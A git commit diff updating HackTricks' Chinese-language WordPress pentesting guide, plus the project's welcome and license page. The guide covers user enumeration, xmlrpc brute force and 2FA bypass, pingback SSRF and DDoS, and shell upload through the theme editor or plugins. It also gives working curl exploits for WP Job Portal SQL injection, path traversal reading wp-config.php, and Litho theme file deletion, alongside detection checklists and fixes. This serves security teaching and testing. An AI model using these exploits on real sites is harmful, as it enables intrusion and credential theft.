Translated ['src/network-services-pentesting/pentesting-web/wordpress.md

This commit is contained in:
Translator 2025-08-13 16:34:56 +00:00
parent f40959ef0a
commit b6506c840c
2 changed files with 107 additions and 51 deletions

View File

@ -5,7 +5,7 @@
## 基本信息
- **上传**的文件位于: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
- **主题文件可以在 /wp-content/themes/ 中找到,** 所以如果你改主题的一些 php 文件以获取 RCE你可能会使用该路径。例如使用 **theme twentytwelve** 你可以 **访问** **404.php** 文件在: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
- **主题文件可以在 /wp-content/themes/ 中找到,** 所以如果你改主题的一些 php 文件以获取 RCE你可能会使用该路径。例如使用 **theme twentytwelve** 你可以 **访问** **404.php** 文件在: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
- **另一个有用的 URL 可能是:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
@ -16,7 +16,7 @@
- `index.php`
- `license.txt` 包含有用的信息,例如安装的 WordPress 版本。
- `wp-activate.php` 用于设置新 WordPress 站时的电子邮件激活过程。
- `wp-activate.php` 用于设置新 WordPress 站时的电子邮件激活过程。
- 登录文件夹(可能被重命名以隐藏):
- `/wp-admin/login.php`
- `/wp-admin/wp-login.php`
@ -26,11 +26,11 @@
- `wp-content` 文件夹是存储插件和主题的主要目录。
- `wp-content/uploads/` 是存储上传到平台的任何文件的目录。
- `wp-includes/` 这是存储核心文件的目录例如证书、字体、JavaScript 文件和小部件。
- `wp-sitemap.xml` 在 WordPress 版本 5.5 及更高版本中WordPress 生成一个包含所有公共帖子和可公开查询的帖子类型分类法的站点地图 XML 文件。
- `wp-sitemap.xml` 在 WordPress 版本 5.5 及更高版本中WordPress 生成一个包含所有公共帖子和可公开查询的帖子类型分类法的站点地图 XML 文件。
**后期利用**
- `wp-config.php` 文件包含 WordPress 连接数据库所需的信息,例如数据库名称、数据库主机、用户名和密码、认证密钥和盐,以及数据库表前缀。该配置文件还可以用于激活 DEBUG 模式,这在故障排除时可能很有用。
- `wp-config.php` 文件包含 WordPress 连接数据库所需的信息,例如数据库名称、数据库主机、用户名和密码、认证密钥和盐,以及数据库表前缀。该配置文件还可以用于激活 DEBUG 模式,这在故障排除时非常有用。
### 用户权限
@ -72,7 +72,7 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
### 提取版本一般来说
### 提取版本信息一般来说
```bash
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
@ -89,7 +89,7 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
```bash
curl -s -I -X GET http://blog.example.com/?author=1
```
如果响应是 **200****30X**,这意味着 id 是 **有效**。如果响应是 **400**,则 id 是 **无效**。
如果响应是 **200****30X**,这意味着 id 是 **有效**。如果响应是 **400**,则 id 是 **无效**
- **wp-json:** 您还可以通过查询来获取有关用户的信息:
```bash
@ -99,7 +99,7 @@ curl http://blog.example.com/wp-json/wp/v2/users
```bash
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
```
注意,此端点仅公开已发布帖子的用户。**仅提供启用此功能的用户的信息**。
注意,此端点仅暴露已发布帖子的用户。**仅提供启用此功能的用户的信息**。
还要注意,**/wp-json/wp/v2/pages** 可能会泄露 IP 地址。
@ -132,7 +132,7 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
</params>
</methodCall>
```
消息 _"用户名或密码不正确"_ 应在凭据无效时出现在 200 代码响应中。
消息 _"用户名或密码不正确"_ 应在 200 代码响应中出现,如果凭据无效
![](<../../images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
@ -172,14 +172,14 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
<figure><img src="../../images/image (628).png" alt=""><figcaption></figcaption></figure>
**绕过2FA**
**绕过 2FA**
此方法是针对程序而非人类的,因此较旧,不支持2FA。因此如果您拥有有效的凭据但主要入口受到2FA保护**您可能能够利用xmlrpc.php使用这些凭据登录从而绕过2FA**。请注意您将无法执行通过控制台可以执行的所有操作但您仍然可能能够达到RCE正如Ippsec在[https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)中解释的那样。
此方法是针对程序而非人类的,并且较旧,因此不支持 2FA。因此如果您拥有有效的凭据但主要入口受到 2FA 保护,**您可能能够利用 xmlrpc.php 使用这些凭据登录,从而绕过 2FA**。请注意,您将无法执行通过控制台可以执行的所有操作,但您仍然可能能够达到 RCE正如 Ippsec [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s) 中解释的那样。
**DDoS或端口扫描**
**DDoS 或端口扫描**
如果您可以在列表中找到方法_**pingback.ping**_则可以使Wordpress向任何主机/端口发送任意请求。\
这可以用来请求**成千上万**的Wordpress**站点**去**访问**一个**位置**(因此在该位置造成**DDoS**),或者您可以用它让**Wordpress**去**扫描**一些内部**网络**(您可以指定任何端口)。
如果您可以在列表中找到方法 _**pingback.ping**_,则可以使 Wordpress 向任何主机/端口发送任意请求。\
这可以用来请求**成千上万**的 Wordpress **站点** **访问**一个**位置**(因此在该位置造成**DDoS**),或者您可以用它让**Wordpress** **扫描**一些内部**网络**(您可以指定任何端口)。
```html
<methodCall>
<methodName>pingback.ping</methodName>
@ -209,7 +209,7 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
### wp-cron.php DoS
此文件通常位于Wordpress站的根目录下:**`/wp-cron.php`**\
此文件通常位于Wordpress站的根目录下:**`/wp-cron.php`**\
当访问此文件时,会执行一个“**重**”的MySQL **查询**,因此可能被**攻击者**用来**造成****DoS**。\
此外,默认情况下,`wp-cron.php`在每次页面加载时被调用每当客户端请求任何Wordpress页面时在高流量网站上可能会导致问题DoS
@ -217,7 +217,7 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
### /wp-json/oembed/1.0/proxy - SSRF
尝试访问_https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_Wordpress站可能会向您发出请求。
尝试访问_https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_Wordpress站可能会向您发出请求。
当它不起作用时的响应是:
@ -231,7 +231,7 @@ https://github.com/t0gu/quickpress/blob/master/core/requests.go
此工具检查**methodName: pingback.ping**和路径**/wp-json/oembed/1.0/proxy**,如果存在,它会尝试利用它们。
## Automatic Tools
## 自动化工具
```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
@ -239,14 +239,14 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
```
## 通过覆盖一个比特获取访问权限
这不仅仅是一次真实攻击,而是一种好奇。在 CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) 中,你可以翻转任何 WordPress 文件的 1 个比特。因此,你可以将文件 `/var/www/html/wp-includes/user.php` 的位置 `5389` 翻转为 NOP NOT (`!`) 操作。
这不仅仅是一次真实攻击,而是一种好奇。在 CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) 中,你可以翻转任何 WordPress 文件的 1 个比特。因此,你可以将文件 `/var/www/html/wp-includes/user.php` 的位置 `5389` 翻转为 NOP NOT (`!`) 操作。
```php
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
```
## **面板 RCE**
**修改所用主题的 php需要管理员凭据**
**修改所用主题的 php需要管理员凭据**
外观 → 主题编辑器 → 404 模板(在右侧)
@ -277,7 +277,7 @@ use exploit/unix/webapp/wp_admin_shell_upload
![](<../../images/image (722).png>)
上传插件并按立即安装:
上传插件并按立即安装
![](<../../images/image (249).png>)
@ -285,7 +285,7 @@ use exploit/unix/webapp/wp_admin_shell_upload
![](<../../images/image (70).png>)
这可能表面上不会有任何效果,但如果您转到媒体,您将看到您的 shell 已上传:
这可能看起来没有任何反应,但如果您转到媒体,您将看到您的 shell 已上传:
![](<../../images/image (462).png>)
@ -303,7 +303,7 @@ use exploit/unix/webapp/wp_admin_shell_upload
- 上传下载插件的 zip 文件。
3. **插件激活**:插件成功安装后,必须通过仪表板激活。
4. **利用**
- 安装并激活插件 "reflex-gallery",可以利用它,因为已知存在漏洞。
- 安装并激活插件“reflex-gallery”可以利用该插件,因为已知存在漏洞。
- Metasploit 框架提供了此漏洞的利用。通过加载适当的模块并执行特定命令,可以建立 meterpreter 会话,从而获得对站点的未经授权访问。
- 注意,这只是利用 WordPress 网站的众多方法之一。
@ -313,7 +313,7 @@ use exploit/unix/webapp/wp_admin_shell_upload
## 从 XSS 到 RCE
- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike)_**WPXStrike**_ 是一个旨在将 **跨站脚本 (XSS)** 漏洞升级为 **远程代码执行 (RCE)** 或其他 WordPress 中的关键漏洞的脚本。有关更多信息,请查看 [**此帖子**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html)。它提供对 WordPress 版本 6.X.X、5.X.X 和 4.X.X 的 **支持,并允许:**
- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike)_**WPXStrike**_ 是一个旨在将 **跨站脚本 (XSS)** 漏洞升级为 **远程代码执行 (RCE)** 或其他关键漏洞的脚本,适用于 WordPress。有关更多信息请查看 [**此帖子**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html)。它提供对 **Wordpress 版本 6.X.X、5.X.X 和 4.X.X 的支持,并允许:**
- _**权限提升:**_ 在 WordPress 中创建用户。
- _**(RCE) 自定义插件(后门)上传:**_ 将您的自定义插件(后门)上传到 WordPress。
- _**(RCE) 内置插件编辑:**_ 编辑 WordPress 中的内置插件。
@ -334,7 +334,7 @@ mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE
### 攻击面
了解 Wordpress 插件如何暴露功能是发现其功能漏洞的关键。您可以在以下要点中找到插件可能暴露功能的方式,以及一些易受攻击插件的示例,详见 [**这篇博客文章**](https://nowotarski.info/wordpress-nonce-authorization/)。
了解 Wordpress 插件如何暴露功能是发现其功能漏洞的关键。您可以在以下要点中找到插件可能暴露功能的方式,以及一些易受攻击插件的示例 [**这篇博客文章**](https://nowotarski.info/wordpress-nonce-authorization/)
- **`wp_ajax`**
@ -345,7 +345,7 @@ mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE
add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
```
**使用 `nopriv` 使得端点可以被任何用户访问(甚至是未认证的用户)。**
**使用 `nopriv` 使得端点可以被任何用户访问(甚至是未认证的用户)。**
> [!CAUTION]
> 此外,如果该函数仅使用 `wp_verify_nonce` 检查用户的授权,该函数只是检查用户是否已登录,通常并不检查用户的角色。因此,低权限用户可能会访问高权限的操作。
@ -399,13 +399,13 @@ add_action( 'wp_ajax_nopriv_litho_remove_font_family_action_data', 'litho_remove
```
此代码片段引入的问题:
* **未认证访问** 注册了 `wp_ajax_nopriv_` 钩子。
* **没有 nonce / 权限检查** 任何访客都可以访问该端点。
* **未经身份验证的访问** 注册了 `wp_ajax_nopriv_` 钩子。
* **没有 nonce / 能力检查** 任何访客都可以访问该端点。
* **没有路径清理** 用户控制的 `fontfamily` 字符串在没有过滤的情况下连接到文件系统路径,允许经典的 `../../` 遍历。
#### 利用
攻击者可以通过发送一个 HTTP POST 请求删除任何 **上传基础目录以下的** 文件或目录(通常是 `<wp-root>/wp-content/uploads/`
攻击者可以通过发送一个 HTTP POST 请求删除 **上传基础目录**(通常是 `<wp-root>/wp-content/uploads/`下的任何文件或目录
```bash
curl -X POST https://victim.com/wp-admin/admin-ajax.php \
-d 'action=litho_remove_font_family_action_data' \
@ -417,7 +417,7 @@ curl -X POST https://victim.com/wp-admin/admin-ajax.php \
#### 检测清单
* 任何 `add_action( 'wp_ajax_nopriv_...')` 回调调用文件系统助手`copy()``unlink()``$wp_filesystem->delete()` 等)。
* 任何调用文件系统助手的 `add_action( 'wp_ajax_nopriv_...')` 回调(`copy()``unlink()``$wp_filesystem->delete()` 等)。
* 将未经过滤的用户输入连接到路径中(查找 `$_POST``$_GET``$_REQUEST`)。
* 缺少 `check_ajax_referer()``current_user_can()`/`is_user_logged_in()`
@ -441,7 +441,7 @@ add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_
// 🔒 NO wp_ajax_nopriv_ registration
```
> [!TIP]
> **始终**将任何磁盘上的写入/删除操作视为特权操作,并进行双重检查:
> **始终** 将任何磁盘上的写入/删除操作视为特权操作,并进行双重检查:
> • 身份验证 • 授权 • 随机数 • 输入清理 • 路径限制(例如通过 `realpath()` 加上 `str_starts_with()`)。
---
@ -472,8 +472,64 @@ add_filter( 'auto_update_theme', '__return_true' );
- **限制登录尝试** 以防止暴力攻击
- 重命名 **`wp-admin.php`** 文件,并仅允许内部或特定 IP 地址访问。
### 通过验证不足的未认证 SQL 注入 (WP Job Portal <= 2.3.2)
WP Job Portal 招聘插件暴露了一个 **savecategory** 任务,最终在 `modules/category/model.php::validateFormData()` 中执行以下易受攻击的代码:
```php
$category = WPJOBPORTALrequest::getVar('parentid');
$inquery = ' ';
if ($category) {
$inquery .= " WHERE parentid = $category "; // <-- direct concat
}
$query = "SELECT max(ordering)+1 AS maxordering FROM "
. wpjobportal::$_db->prefix . "wj_portal_categories " . $inquery; // executed later
```
引入此代码片段的问题:
1. **未清理的用户输入** `parentid` 直接来自 HTTP 请求。
2. **WHERE 子句中的字符串连接** 没有 `is_numeric()` / `esc_sql()` / 预处理语句。
3. **未经身份验证的可达性** 尽管该操作是通过 `admin-post.php` 执行的,但唯一的检查是 **CSRF nonce** (`wp_verify_nonce()`),任何访客都可以从嵌入短代码 `[wpjobportal_my_resumes]` 的公共页面中获取。
#### 利用
1. 获取一个新的 nonce
```bash
curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
```
2. 通过滥用 `parentid` 注入任意 SQL
```bash
curl -X POST https://victim.com/wp-admin/admin-post.php \
-d 'task=savecategory' \
-d '_wpnonce=<nonce>' \
-d 'parentid=0 OR 1=1-- -' \
-d 'cat_title=pwn' -d 'id='
```
响应显示了注入查询的结果或更改了数据库,证明了 SQLi。
### 未经身份验证的任意文件下载 / 路径遍历 (WP Job Portal <= 2.3.2)
另一个任务,**downloadcustomfile**,允许访客通过路径遍历下载 **磁盘上的任何文件**。 受影响的代码位于 `modules/customfield/model.php::downloadCustomUploadedFile()`
```php
$file = $path . '/' . $file_name;
...
echo $wp_filesystem->get_contents($file); // raw file output
```
`$file_name` 是攻击者控制的,并且**未经过清理**地连接。再次强调,唯一的门槛是可以从简历页面获取的**CSRF 随机数**。
#### 利用
```bash
curl -G https://victim.com/wp-admin/admin-post.php \
--data-urlencode 'task=downloadcustomfile' \
--data-urlencode '_wpnonce=<nonce>' \
--data-urlencode 'upload_for=resume' \
--data-urlencode 'entity_id=1' \
--data-urlencode 'file_name=../../../wp-config.php'
```
服务器响应 `wp-config.php` 的内容,泄露了数据库凭据和认证密钥。
## 参考
- [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
- [Litho主题中的未认证任意文件删除漏洞](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
- [WP Job Portal插件中修复的多个关键漏洞](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -15,7 +15,7 @@
> - 我们还在 HackTricks 中撰写 **我们自己的研究**
> - 在某些情况下,我们将仅在 HackTricks 中写出技术的重要部分的 **摘要**,并 **鼓励读者访问原始帖子** 以获取更多细节。
> - **组织** 书中的所有黑客技术,使其 **更易获取**
> - HackTricks 团队投入了数千小时的时间,免费 **仅仅是为了组织内容**,以便人们可以 **更快学习**
> - HackTricks 团队投入了数千小时的时间,**仅仅是为了组织内容**,以便人们可以 **更快学习**
<figure><img src="../images/hack tricks gif.gif" alt="" width="375"><figcaption></figcaption></figure>
@ -25,33 +25,33 @@
>
> - **非常感谢这些资源,我该如何感谢你们?**
您可以在推特上公开感谢 HackTricks 团队,提到 [**@hacktricks_live**](https://twitter.com/hacktricks_live)。\
您可以在推特上公开感谢 HackTricks 团队将所有这些资源整理成公开内容,提及 [**@hacktricks_live**](https://twitter.com/hacktricks_live)。\
如果您特别感激,您也可以 [**在这里赞助该项目**](https://github.com/sponsors/carlospolop)。\
别忘了 **在 Github 项目中给个星星!**(在下面找到链接)。
并且不要忘记 **在 Github 项目中给个星星!**(在下面找到链接)。
> [!TIP]
>
> - **我该如何为该项目做贡献?**
您可以 **与社区分享新的技巧和窍门或修复您在书中发现的错误**,通过向相应的 Github 页面发送 **Pull Request**
- [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks)
- [https://github.com/carlospolop/hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)
别忘了 **在 Github 项目中给个星星!**
不要忘记 **在 Github 项目中给个星星!**
> [!TIP]
>
> - **我可以复制一些 HackTricks 的内容并放在我的博客上吗?**
> - **我可以复制一些 HackTricks 的内容并放到我的博客吗?**
可以,但 **别忘了提及具体的链接**,内容是从哪里获取的。
可以,但 **不要忘记提及具体的链接**,内容是从哪里获取的。
> [!TIP]
>
> - **我该如何引用 HackTricks 的页面?**
只要您引用的信息来源的页面 **链接** 出现即可。\
如果您需要 bibtex可以使用类似的格式
只要您引用的页面 **链接** 出现即可。\
如果您需要 bibtex可以使用类似的格式:
```latex
@misc{hacktricks-bibtexing,
author = {"HackTricks Team" or the Authors name of the specific page/trick},
@ -78,7 +78,7 @@ url = {\url{https://book.hacktricks.wiki/specific-page}},
我们有赞助商,因为即使所有内容都是免费的,我们也希望**给社区提供欣赏我们工作的可能性**,如果他们愿意。因此,我们提供人们通过[**Github赞助商**](https://github.com/sponsors/carlospolop)向HackTricks捐款的选项以及**相关的网络安全公司**赞助HackTricks并在书中**放置一些广告**,这些**广告**总是放在不会干扰学习过程的地方,以便让人们在专注于内容时仍能看到。
你不会发现HackTricks充满了烦人的广告就像其他内容远少于HackTricks的博客因为HackTricks不是为了商业目的而制作的。
你不会发现HackTricks充满了烦人的广告就像其他内容远不如HackTricks的博客因为HackTricks不是为了商业目的而制作的。
> [!CAUTION]
>
@ -93,16 +93,16 @@ url = {\url{https://book.hacktricks.wiki/specific-page}},
请注意在HackTricks中链接到你的页面
- 改善你的**SEO**
- 内容被**翻译成15种以上的语言**,使更多人能够访问这些内容
- 内容被**翻译成超过15种语言**,使更多人能够访问这些内容
- **HackTricks鼓励**人们**查看你的页面**有几个人提到自从他们的某个页面出现在HackTricks中他们的访问量增加了
然而如果你仍然希望从HackTricks中删除你博客的内容请告知我们我们将**删除所有指向你博客的链接**及任何基于该内容的内容。
然而如果你仍然希望从HackTricks中删除你博客的内容请告知我们我们将**删除所有指向你博客的链接**,以及任何基于该内容的内容。
> [!CAUTION]
>
> - **如果我在HackTricks中发现抄袭的内容我该怎么办**
我们始终**给予原作者所有的信用**。如果你发现某个页面有抄袭的内容而没有引用原始来源,请告知我们,我们将**删除它**、**在文本前添加链接**或**重写并添加链接**。
我们始终**给予原作者所有的信用**。如果你发现某个页面有抄袭的内容而没有引用原始来源,请告知我们,我们将**删除它**、**在文本前添加链接**或**重写并添加链接**。
## LICENSE
@ -112,29 +112,29 @@ Copyright © 保留所有权利,除非另有说明。
- Attribution: 你可以自由地:
- Share — 以任何媒介或格式复制和重新分发材料。
- Adapt — 混合、转变和基于材料进行构建
- Adapt — 混合、转变并基于材料进行创作
#### Additional Terms:
- Third-Party Content: 本博客/书籍的某些部分可能包含来自其他来源的内容,例如其他博客或出版物的摘录。使用此类内容是基于合理使用原则或获得相关版权持有者的明确许可。请参阅原始来源以获取有关第三方内容的具体许可信息。
- Authorship: HackTricks创作的原始内容受此许可条款的约束。鼓励在分享或改编时将此作品归功于作者。
- Authorship: HackTricks创作的原始内容受此许可条款的约束。鼓励在分享或改编时将此作品归功于作者。
#### Exemptions:
- Commercial Use: 有关此内容商业使用的询,请与我联系。
- Commercial Use: 有关此内容商业使用的询,请与我联系。
本许可证不授予与内容相关的任何商标或品牌权利。所有在本博客/书籍中出现的商标和品牌均为其各自所有者的财产。
此许可不授予与内容相关的任何商标或品牌权利。所有在本博客/书籍中出现的商标和品牌均为其各自所有者的财产。
**通过访问或使用HackTricks你同意遵守本许可证的条款。如果你不同意这些条款,请不要访问本网站。**
**通过访问或使用HackTricks你同意遵守此许可的条款。如果你不同意这些条款,请不要访问此网站。**
## **免责声明**
> [!CAUTION]
> 本书《HackTricks》仅用于教育和信息目的。本书中的内容按“原样”提供,作者和出版商不对信息、产品、服务或本书中包含的相关图形的完整性、准确性、可靠性、适用性或可用性作出任何明示或暗示的陈述或保证。因此,你对这些信息的任何依赖均由你自行承担风险。
> 本书《HackTricks》仅用于教育和信息目的。书中的内容是按“现状”提供的,作者和出版商不对书中包含的信息、产品、服务或相关图形的完整性、准确性、可靠性、适用性或可用性作出任何明示或暗示的陈述或保证。你对这些信息的任何依赖均由你自行承担风险。
>
> 作者和出版商在任何情况下均不对因使用本书而导致的数据或利润损失或任何损失或损害承担责任,包括但不限于间接或后果性损失或损害。
> 作者和出版商在任何情况下均不对因使用本书而导致的任何损失或损害承担责任,包括但不限于间接或后果性损失或损害,或因数据或利润损失而产生的任何损失或损害。
>
> 此外,本书中描述的技术和技巧仅供教育和信息目的,不应用于任何非法或恶意活动。作者和出版商不支持或纵容任何非法或不道德的活动,使用本书中包含的信息的任何行为均由用户自行承担风险和判断
> 此外,本书中描述的技术和技巧仅供教育和信息目的,不应用于任何非法或恶意活动。作者和出版商不支持或纵容任何非法或不道德的活动,使用本书中包含的信息的风险和判断完全由用户自行承担
>
> 用户对基于本书中包含的信息采取的任何行动负全部责任,并应在尝试实施本书中描述的任何技术或技巧时始终寻求专业建议和帮助。
>